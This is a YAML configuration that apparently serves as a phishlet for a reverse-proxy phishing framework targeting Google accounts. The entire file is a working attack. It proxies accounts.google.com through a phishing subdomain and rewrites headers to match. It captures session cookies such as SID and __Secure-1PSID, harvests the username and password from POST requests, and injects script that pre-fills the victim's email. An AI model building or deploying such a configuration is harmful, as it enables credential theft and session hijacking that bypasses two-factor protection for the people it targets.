name: 'google'
min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: '{{.Endpoint3}}', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
sub_filters:
  - {trg: 'accounts.google.com', orig: 'accounts.google.com', repl: '{{.Endpoint3}}.{hostname}', triggers_on: 'google', search: '(.*)', type: 'header'}
auth_tokens:
  - domain: '.google.com'
    keys: ['SID', 'LSID', '__Secure-1PSID', '__Secure-3PSID']
credentials:
  username:
    key: 'identifier'
    search: '(.*)'
    type: 'post'
  password:
    key: 'Passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'accounts.google.com'
  path: '/v3/signin/identifier'
js_inject:
  - trigger: 'accounts.google.com'
    code: |
      (function() {
        var urlParams = new URLSearchParams(window.location.search);
        var email = urlParams.get('email');
        if (email) {
          var emailField = document.querySelector('input[type="email"]');
          if (emailField) {
            emailField.value = email;
            emailField.dispatchEvent(new Event('input', { bubbles: true }));
          }
        }
      })()